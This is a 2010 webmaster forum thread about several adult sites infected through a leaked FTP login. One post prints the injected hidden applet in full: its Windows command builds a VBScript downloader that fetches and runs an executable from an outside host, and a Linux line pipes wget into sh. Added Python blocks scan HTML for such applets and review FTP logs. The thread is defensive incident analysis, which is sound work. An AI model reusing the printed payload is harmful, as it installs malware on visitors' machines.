Greenguy's Board
Old 2010-06-03, 07:27 AM   #1
LD
wtfwjd?
Join Date: May 2007
Posts: 2,103
Trojan horse on my sites

Avast is reporting problems on some of my sites:

Code:
http://www.lusciousdelights.com/
http://www.joyporn.net/
http://sleazyporntube.com/
http://www.pantyerotica.com/
http://fuckingfreeforall.com/
I am working on getting it fixed, sorry for the inconvenience.
Attached image: trojanwarning.jpg
Old 2010-06-03, 09:14 AM   #2
Useless
Certified Nice Person
Join Date: Oct 2003
Location: Dirty Undies, NY
Posts: 11,268
I have AVG integrated with my Google search, and they're still saying your sites are safe, so that's good. As long as you get it fixed before Google begins de-listing you, you'll be fine. I clicked through to all of them, and only the free-for-all site is popping something suspicious: something about an unverified application attempting to run.
Old 2010-06-03, 09:34 AM   #3
Cleo
Subversive filth of the hedonistic decadent West
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
Quote:
Originally Posted by Useless Warrior View Post
the free for all site is popping something suspicious. Something about an unverified application attempting to run.
This is it,
Code:
<applet width='0' height='0' code='Client.class' archive='Client.jar'>
<param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs   http://galengroup.org/1.exe %temp%\update.exe'>
<param name='windows2' value=''>

<param name='unix1' value="">
<param name='unix2' value="">

<param name='linux1' value="wget http://galengroup.org/1.exe -O- | sh">
<param name='linux2' value="">

</applet>
Attached image: Screen shot 2010-06-03 at 9.32.44 AM.jpg
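Cleo's snippet above is the injected element: a zero-by-zero applet whose <param> values hold platform-specific download-and-run commands. As an added example (not from the thread or any of the posters), the Python below scans HTML for that shape: applets sized 0x0, or applet parameters carrying shell markers. The sample page, the marker list and the attacker.invalid URL are constructed for the example.

```python
"""Added example (not from the thread): find hidden Java applets whose
<param> values carry download-and-run commands, the pattern injected into
the compromised pages. SAMPLE_HTML and SUSPICIOUS_MARKERS are constructed."""
from html.parser import HTMLParser
from pathlib import Path

# Substrings that do not belong in an applet parameter on a content site.
# Constructed for this example; extend from your own incident data.
SUSPICIOUS_MARKERS = ("cmd.exe", "wscript", "%temp%", "wget ", "curl ", "| sh", ".exe")

# Constructed page: one legitimate image-viewer applet, one injected applet.
SAMPLE_HTML = """<html><body>
<h1>Gallery</h1>
<applet width='300' height='200' code='Viewer.class' archive='viewer.jar'>
<param name='image' value='photo1.jpg'>
</applet>
<applet width='0' height='0' code='Client.class' archive='Client.jar'>
<param name='windows1' value='cmd.exe /c echo x > %temp%\\w.vbs & start %temp%\\w.vbs'>
<param name='linux1' value="wget http://attacker.invalid/1.exe -O- | sh">
</applet>
</body></html>"""


class AppletCollector(HTMLParser):
    """Records every <applet> with its attributes and the <param>s inside it."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "applet":
            self._current = {"attrs": attrs, "params": {}}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "")] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None


def applet_findings(html):
    """One finding per applet that is sized 0x0 or whose params contain shell markers."""
    collector = AppletCollector()
    collector.feed(html)
    findings = []
    for applet in collector.applets:
        a = applet["attrs"]
        hidden = a.get("width", "").strip() == "0" and a.get("height", "").strip() == "0"
        values = " ".join(applet["params"].values()).lower()
        markers = sorted(m for m in SUSPICIOUS_MARKERS if m in values)
        if hidden or markers:
            findings.append({"code": a.get("code", ""), "archive": a.get("archive", ""),
                             "hidden": hidden, "markers": markers})
    return findings


def scan_web_root(root):
    """Map each HTML-like file under root to its findings (files with none are omitted)."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".html", ".htm", ".php", ".shtml"):
            found = applet_findings(path.read_text(errors="replace"))
            if found:
                results[str(path)] = found
    return results


if __name__ == "__main__":
    for f in applet_findings(SAMPLE_HTML):
        print(f"{f['code']} ({f['archive']}): hidden={f['hidden']} markers={f['markers']}")
```

Run `scan_web_root("/path/to/htdocs")` across a site to list every file carrying such an applet; the 0x0 size check catches variants whose parameter text has been obfuscated, and the marker check catches visible applets that still carry commands.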
Old 2010-06-03, 10:37 AM   #4
LD
wtfwjd?
Join Date: May 2007
Posts: 2,103
Chris at Colo-Cation is on it, looks like it's fixed. I just notified him this morning a little while ago, so it was a very quick response and fix.

It looks like someone uploaded something via ftp using my login. The interesting thing is, I recently entered my login info in the "hidden" area at JBM software's support forum for Jeremy to check something out. That's the only time I have ever given this info out...hmmm
Old 2010-06-03, 11:47 AM   #5
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
That would explain the other client with tubex being compromised from the same IP.
Old 2010-06-03, 12:03 PM   #6
LeRoy
"Young dumb and full of cum"
Join Date: Jun 2007
Location: Porn Valley
Posts: 2,370
Is this a tubex related incident or JBM Soft?

All of a sudden I'm a little worried now.
Old 2010-06-03, 12:16 PM   #7
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
The hacker used the FTP username/password to modify a few files on the server. Generally when that happens, the username/password has been leaked somewhere through a keylogger/spyware/trojan or, like this case, a vendor storing the user/password/hostname in the clear somewhere.

When you give a password to a vendor, you should change it after they are done, or, change it to something, give it to them, and then change it after they are done.

You would be surprised at the frequency this happens.
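Both halves of cd34's point, a leaked FTP login used to modify files and one source address turning up across several customers, are visible in the FTP server log. As an added example (not cd34's or the host's tooling), the Python below parses vsftpd-style log lines and flags writes from addresses outside each account's expected set, plus addresses shared by more than one account. The log lines, account names and expected-address table are constructed; the IP addresses are documentation ranges.

```python
"""Added example (not from the thread): review FTP server logs for a leaked
account used from an unfamiliar address to change files, and for one address
appearing across several accounts. Log lines are vsftpd-style and constructed;
IPs are documentation ranges."""
import re
from collections import defaultdict

# vsftpd-style login/transfer lines, e.g.
#   Thu Jun  3 03:14:02 2010 [pid 3990] [ld] OK LOGIN: Client "198.51.100.77"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d+ [\d:]+ \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'(?P<status>OK|FAIL) (?P<action>LOGIN|UPLOAD|DELETE): Client "(?P<ip>[^"]+)"'
    r'(?:, "(?P<path>[^"]+)")?'
)

# Constructed log: an unfamiliar address writes to two accounts in the early
# hours, then the real owner of "ld" works from the usual address later.
SAMPLE_LOG = """\
Thu Jun  3 03:14:02 2010 [pid 3990] [ld] OK LOGIN: Client "198.51.100.77"
Thu Jun  3 03:14:09 2010 [pid 3990] [ld] OK UPLOAD: Client "198.51.100.77", "/htdocs/index.html", 5120 bytes, 60.02Kbyte/sec
Thu Jun  3 03:14:12 2010 [pid 3990] [ld] OK UPLOAD: Client "198.51.100.77", "/htdocs/Client.jar", 7331 bytes, 55.90Kbyte/sec
Thu Jun  3 03:21:45 2010 [pid 3994] [cleo] OK LOGIN: Client "198.51.100.77"
Thu Jun  3 03:22:01 2010 [pid 3994] [cleo] OK UPLOAD: Client "198.51.100.77", "/htdocs/index.html", 4870 bytes, 58.13Kbyte/sec
Thu Jun  3 07:02:11 2010 [pid 4101] [ld] OK LOGIN: Client "203.0.113.5"
Thu Jun  3 07:02:40 2010 [pid 4101] [ld] OK UPLOAD: Client "203.0.113.5", "/htdocs/gallery.html", 2210 bytes, 40.11Kbyte/sec
Thu Jun  3 07:05:13 2010 [pid 4102] [ld] FAIL LOGIN: Client "203.0.113.5"
"""

# Addresses each account is normally used from (constructed; in practice built
# from the customer's own records or a baseline of earlier logins).
EXPECTED_IPS = {"ld": {"203.0.113.5"}, "cleo": {"192.0.2.20"}}


def parse_ftp_log(text):
    """Parse matching lines into dicts; lines of other formats are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def review_ftp_events(events, expected_ips):
    """Return writes from unexpected addresses and addresses shared across accounts."""
    unexpected_writes = []
    users_per_ip = defaultdict(set)
    for e in events:
        if e["status"] != "OK":
            continue  # failed logins are worth counting separately, not here
        users_per_ip[e["ip"]].add(e["user"])
        if e["action"] in ("UPLOAD", "DELETE") and e["ip"] not in expected_ips.get(e["user"], set()):
            unexpected_writes.append(e)
    shared_ips = {ip: sorted(users) for ip, users in users_per_ip.items() if len(users) > 1}
    return {"unexpected_writes": unexpected_writes, "shared_ips": shared_ips}


if __name__ == "__main__":
    report = review_ftp_events(parse_ftp_log(SAMPLE_LOG), EXPECTED_IPS)
    for e in report["unexpected_writes"]:
        print(f"{e['ts']} {e['user']} {e['action']} {e['path']} from {e['ip']}")
    for ip, users in report["shared_ips"].items():
        print(f"{ip} used by accounts: {', '.join(users)}")
```

The temporary-account practice Cleo and cd34 describe fits the same review: after the vendor is done, the account's logins should all come from the vendor's address within the agreed window, and any write outside that set is the signal to rotate the credential and diff the web root.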
Old 2010-06-03, 12:22 PM   #8
Cleo
Subversive filth of the hedonistic decadent West
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
Quote:
Originally Posted by LeRoy View Post
Is this a tubex related incident or JBM Soft?
Quote:
Originally Posted by cd34 View Post
When you give a password to a vendor, you should change it after they are done, or, change it to something, give it to them, and then change it after they are done.
This is why I always add a user name with a temp password to my server that I then change after they are done.

I did this just last month after I wanted JBM Soft to take a look at my install of TubeX.
Old 2010-06-03, 02:17 PM   #9
LD
wtfwjd?
Join Date: May 2007
Posts: 2,103
Quote:
Originally Posted by cd34 View Post
The hacker used the FTP username/password to modify a few files on the server. Generally when that happens, the username/password has been leaked somewhere through a keylogger/spyware/trojan or, like this case, a vendor storing the user/password/hostname in the clear somewhere.

When you give a password to a vendor, you should change it after they are done, or, change it to something, give it to them, and then change it after they are done.

You would be surprised at the frequency this happens.
Thanks for getting it fixed so quickly.

Guess you can't be too careful...live and learn.
Old 2010-06-03, 03:43 PM   #10
SimonT
Well you know boys, a nuclear reactor is a lot like women. You just have to read the manual and press the right button
Join Date: Sep 2003
Location: United Kingdom
Posts: 150
Had this happen to me too but not with JBM - created a temp ftp account and sure enough after the company had used it someone else sneaked in and installed a load of crap on the server.